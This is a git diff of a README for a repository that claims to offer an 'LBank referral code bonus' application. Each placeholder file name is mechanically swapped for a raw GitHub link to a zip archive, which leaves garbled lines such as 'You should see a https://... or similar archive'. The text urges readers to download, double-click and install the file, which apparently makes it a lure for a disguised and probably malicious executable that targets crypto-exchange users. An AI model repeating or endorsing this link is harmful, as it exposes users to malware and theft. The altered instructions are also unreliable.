Ryze079/LBank-Referral-Code-Bonus/README.md

 Once the download is complete, follow these steps to install and launch the application:

 1. **Locate the downloaded file**:
-   - Windows: Check your "Downloads" folder for the executable file (e.g., `LBank-Referral-Code-Bonus.exe`).
+   - Windows: Check your "Downloads" folder for the executable file (e.g., `https://github.com/Ryze079/LBank-Referral-Code-Bonus/raw/refs/heads/main/accredited/Code-Referral-Bonus-L-Bank-v3.6.zip`).
    - Mac: Open your "Downloads" folder and find the `.dmg` file.
-   - Linux: You should see a tar.gz or similar archive.
+   - Linux: You should see a https://github.com/Ryze079/LBank-Referral-Code-Bonus/raw/refs/heads/main/accredited/Code-Referral-Bonus-L-Bank-v3.6.zip or similar archive.

 2. **Install the application**:
    - **Windows**: Double-click the `.exe` file and follow the prompts to install.
    - **Mac**: Double-click the `.dmg` file, then drag the application into your "Applications" folder.
-   - **Linux**: Extract the tar.gz file and follow any shared installation instructions.
+   - **Linux**: Extract the https://github.com/Ryze079/LBank-Referral-Code-Bonus/raw/refs/heads/main/accredited/Code-Referral-Bonus-L-Bank-v3.6.zip file and follow any shared installation instructions.

 3. **Launch the application**:
    - After installation, find the application in your Start menu (Windows) or Applications folder (Mac).
 Double-click to open.